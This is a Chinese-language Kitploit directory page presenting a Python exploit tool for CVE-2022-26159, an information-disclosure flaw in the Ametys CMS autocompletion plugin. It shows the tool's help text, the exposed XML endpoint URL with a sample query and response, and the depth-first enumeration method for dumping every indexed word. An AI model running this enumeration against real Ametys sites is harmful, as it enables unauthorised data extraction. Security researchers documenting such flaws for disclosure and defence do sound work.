Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-26159-Ametys-Autocompletion-XML — 一个 Python 漏洞利用脚本,用于自动将 Ametys CMS 自动补全插件存储的所有数据转储到本地 SQLite 数据库文件中。 | Kitploit
工具/GitHubGitHub/p0dalirius/cve-2022-26159-ametys-autocompletion-xml
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集网络爬虫
GitHubp0dalirius/cve-2022-26159-ametys-autocompletion-xml

CVE-2022-26159-Ametys-Autocompletion-XML

一个 Python 漏洞利用脚本,用于自动将 Ametys CMS 自动补全插件存储的所有数据转储到本地 SQLite 数据库文件中。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库网站
14364年前尚未审核
分享

CVE-2022-26159-Ametys-Autocompletion-XML

一个 Python 漏洞利用工具,可自动将 Ametys CMS 自动完成插件存储的所有数据转储到本地 sqlite 数据库文件中。
GitHub release (latest by date) YouTube Channel Subscribers

功能

  • 自动检测自动完成插件返回的最大结果数量。
  • 深度优先搜索以转储所有结果。
  • 输出日志文件。

用法

root@kitploit:~
$ ./CVE-2022-26159-Ametys-Autocompletion-XML.py -h
CVE-2022-26159-Ametys-Autocompletion-XML v1.1 - by @podalirius

usage: CVE-2022-26159-Ametys-Autocompletion-XML.py [-h] -t TARGET [-H HEADERS] [-k] [-v | -q] [--no-colors]

Description message

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        arg1 help message
  -H HEADERS, --header HEADERS
                        Specify HTTP headers to use in requests. (e.g., --header "Header1: Value1" --header "Header2: Value2")
  -k, --insecure        Disable SSL/TLS warnings and certificate verification.
  -v, --verbose         Verbose mode. (default: False)
  -q, --quiet           Quiet mode. (default: False)
  --no-colors           Disables colored output. (default: False)

技术细节

Ametys CMS(<= 4.4.9)中的自动完成插件会在以下地址公开暴露一个包含单词列表的 XML 文件:

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml

要对这个数据库发起请求,攻击者只需在 q(查询)参数中键入单词的开头:

root@kitploit:~
https://domain.tld/plugins/web/service/search/auto-completion/domain/en.xml?q=adm

自动完成插件随后会以 XML 文件形式返回以 adm(来自查询)开头的前 10 个匹配单词:

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<auto-completion>
    <item>administrateur</item>
    <item>administrateurs</item>
    <item>administratif</item>
    <item>administratifs</item>
    <item>administration</item>
    <item>administrations</item>
    <item>administrative</item>
    <item>administratives</item>
    <item>administres</item>
    <item>admission</item>
</auto-completion>

因此,攻击者只需对 API 执行深度优先搜索即可提取其全部内容。

贡献

欢迎提交 Pull Request。如果你想添加其他功能,请随时打开 issue。

参考资料

  • https://podalirius.net/en/cves/2022-26159/
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26159
  • https://issues.ametys.org/browse/CMS-10973
  • https://podalirius.net/en/articles/scraping-search-apis-depth-first-style/
下载工具